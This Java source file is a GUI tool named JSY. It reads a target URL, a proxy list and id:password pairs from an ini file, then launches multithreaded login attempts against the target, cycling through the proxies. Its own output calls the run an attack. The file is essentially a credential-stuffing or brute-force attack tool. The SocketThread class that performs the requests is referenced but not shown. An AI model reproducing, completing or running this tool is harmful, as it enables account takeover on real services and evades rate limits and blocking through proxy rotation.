
import java.awt.*;
import java.awt.event.*;
import java.net.*;
import java.io.*;
import java.util.*;


public class JSY extends Frame
                        implements Runnable, ActionListener, WindowListener {
    protected int width, height;

    protected Thread    thread      = null;
    protected int       sleepTime   = 1000;

    protected int       threadMax   = 10;
    protected int       timeout     = 2000;

    protected Button    startButton = new Button( "START" );
    protected Button    stopButton  = new Button( "STOP" );

    protected TextField toutField   = new TextField( "2000" );
    protected TextField mthField    = new TextField( "10" );
    protected Choice    rdmChoice   = new Choice();

    protected TextField tgtField    = new TextField();
    protected Choice    prxChoice   = new Choice();
    protected TextArea  repArea     = new TextArea();

    protected Hashtable idpass      = new Hashtable(100);
    protected String    dataFile    = "JSY.ini";


    public static void main( String[] args ) {
        new JSY();
    }


    public JSY() {
        width  = 380;
        height = 400;

        setSize( width, height );
        setBackground( Color.lightGray );
        setLayout( null );

        startButton.setBounds( width/2 - 65,  40,  60, 20 );
        stopButton. setBounds( width/2 +  5,  40,  60, 20 );
        add( startButton );
        add( stopButton );
        startButton.addActionListener( this );
        stopButton. addActionListener( this );

        Label toutLabel = new Label( "TIMEOUT" );     add( toutLabel );
        Label mthLabel  = new Label( "MAX THREAD" );  add( mthLabel );
        toutLabel.setBounds(  10,  70,  60, 20 );
        toutField.setBounds(  70,  70,  40, 20 );
        mthLabel. setBounds( 120,  70,  80, 20 );
        mthField. setBounds( 200,  70,  40, 20 );
        rdmChoice.setBounds( 250,  70, 110, 20 );
        add( toutField );
        add( mthField );
        add( rdmChoice );
        rdmChoice.add( "use Proxy" );
        rdmChoice.add( "no  Proxy" );

        Label tgtLabel = new Label( "TARGET" ); add( tgtLabel );
        Label prxLabel = new Label( "PROXY" );  add( prxLabel );
        tgtLabel. setBounds(  10, 100,  50,        20 );
        tgtField. setBounds(  60, 100, width - 80, 20 );
        prxLabel. setBounds(  10, 130,  50,        20 );
        prxChoice.setBounds(  60, 130, width - 80, 20 );
        repArea.  setBounds(  20, 160, width - 40, height - 180 );

        add( tgtField );
        add( prxChoice );
        add( repArea );

        readDataFile();
        addWindowListener( this );
        setVisible( true );


        System.err.println( "size : " + idpass.size() );
    }


    public void start() {
        if ( thread == null ) {
            thread = new Thread( this );
            thread.start();
        }
    }


    public void stop() {
        if ( thread != null ) {
            thread.stop();
            thread = null;
        }
    }


    public int getTimeout() {
        try {
            return Integer.parseInt( toutField.getText() );
        }
        catch ( Exception e ) {
            System.err.println( "Exception in getTimeout : " + e );
            return 2000;
        }
    }


    public void run() {
        try {
            int         tcount = Thread.activeCount();
            int         max    = tcount + Integer.parseInt( mthField.getText() );
            String      rdm    = rdmChoice.getSelectedItem();
            Enumeration enum   = idpass.keys();
            URL         target = new URL( tgtField.getText() );

            if ( rdm.equals( "use Proxy" ) ) {
                int ct = 0;

                while ( enum.hasMoreElements() ) {
                    if ( Thread.activeCount() <= max ) {
                        String key   = (String) enum.nextElement();
                        URL    proxy = new URL( prxChoice.getItem( ct ) );
                        if ( ++ct >= prxChoice.getItemCount() ) ct = 0;

                        new SocketThread( proxy, target, key, 
                                          (String)idpass.get( key ), this ).start();
                        thread.sleep( sleepTime );
                    }
                }
            }
            else {

                while ( enum.hasMoreElements() ) {
                    if ( Thread.activeCount() <= max ) {
                        String key = (String) enum.nextElement();

                        new SocketThread( null, target, key,
                                          (String)idpass.get( key ), this ).start();
                        thread.sleep( sleepTime );
                    }
                }
            }

            while ( Thread.activeCount() > tcount );
            System.out.println( "#end attack " );

            stop();
        }
        catch ( Exception e ) {
            System.err.println( "Exception in run : " + e );
        }
    }


    public void actionPerformed( ActionEvent e ) {
        Object obj = e.getSource();
        if      ( obj == startButton ) start();
        else if ( obj == stopButton )  stop();
    }


    public void windowClosing    ( WindowEvent e ) { dispose(); System.exit( 1 ); }
    public void windowOpened     ( WindowEvent e ) { }
    public void windowClosed     ( WindowEvent e ) { }
    public void windowIconified  ( WindowEvent e ) { }
    public void windowDeiconified( WindowEvent e ) { }
    public void windowActivated  ( WindowEvent e ) { }
    public void windowDeactivated( WindowEvent e ) { }


    protected void readDataFile() {
        try {
            BufferedReader br = new BufferedReader( new FileReader( dataFile ) );

            while ( true ) {
                String line = br.readLine().trim();
                if      ( line.startsWith( "EndOfFile" ) )
                    break;
                else if ( line.equals( "" ) || line.startsWith( "#" ) )
                    continue;

                else if ( line.startsWith( "target" ) ) {

                    while ( true ) {
                        String s = br.readLine().trim();
                        if ( s.startsWith( "}" ) )
                            break;
                        if ( s.startsWith( "#" ) || s.equals( "" ) )
                            continue;
                        else
                            tgtField.setText( s );
                    }
                }
                else if ( line.startsWith( "proxy" ) ) {

                    while ( true ) {
                        String s = br.readLine().trim();
                        if ( s.startsWith( "}" ) )
                            break;
                        if ( s.startsWith( "#" ) || s.equals( "" ) )
                            continue;
                        else
                            prxChoice.addItem( s );
                    }
                }
                else if ( line.startsWith( "idpass" ) ) {

                    while ( true ) {
                        String s = br.readLine().trim();
                        if ( s.startsWith( "}" ) )
                            break;
                        if ( s.startsWith( "#" ) || s.equals( "" ) )
                            continue;
                        else {
                            int id = s.indexOf(':');
                            if ( id != -1 )
                                idpass.put( s.substring( 0, id ). trim(),
                                            s.substring( id + 1 ).trim() );
                        }
                    }
                }
            }
            br.close();
        }
        catch ( Exception e ) {
            System.err.println( "Exception in readDataFile : " + e );
        }
    }


}
